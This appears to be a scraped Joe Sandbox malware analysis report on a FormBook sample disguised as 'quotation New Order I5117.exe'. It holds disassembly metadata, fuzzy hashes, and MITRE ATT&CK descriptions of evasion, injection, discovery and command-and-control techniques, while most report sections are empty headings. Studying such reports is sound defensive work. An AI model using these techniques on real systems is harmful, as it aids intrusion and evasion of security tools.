iswspace.MSVCRT ref: 00D8DF07
wcschr.MSVCRT ref: 00D8DF18

Strings

=,;, xrefs: 00D8DF13

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: iswspacewcschr
String ID: =,;
API String ID: 287713880-1539845467
Opcode ID: 14c388219e1ac4ae0ea6990c959750ea85fc7359f2e981c0f765dee571294ea1
Instruction ID: 0d9f096ffa7d20baeb05685e432841d83557cc996477c3d2a4929e8016fbf6bf
Opcode Fuzzy Hash: 14c388219e1ac4ae0ea6990c959750ea85fc7359f2e981c0f765dee571294ea1
Instruction Fuzzy Hash: BAE012366086929647342649A81986BB7DE8ED6B2132E011BFA46D21D4E7518C01A7B4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report quotation New Order I5117.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Function 06328960, Relevance: 24.2, Strings: 19, Instructions: 464
COMMON

Function 063214D8, Relevance: 2.5, Strings: 2, Instructions: 43
COMMON

Function 0193A1F0, Relevance: 1.7, APIs: 1, Instructions: 195
COMMON

Function 019355DD, Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Function 01933FE0, Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 0193C710, Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Function 0193AF14, Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Function 01939560, Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Function 0193A650, Relevance: 1.6, APIs: 1, Instructions: 53
libraryCOMMON

Function 0193A3D0, Relevance: 1.5, APIs: 1, Instructions: 47
COMMON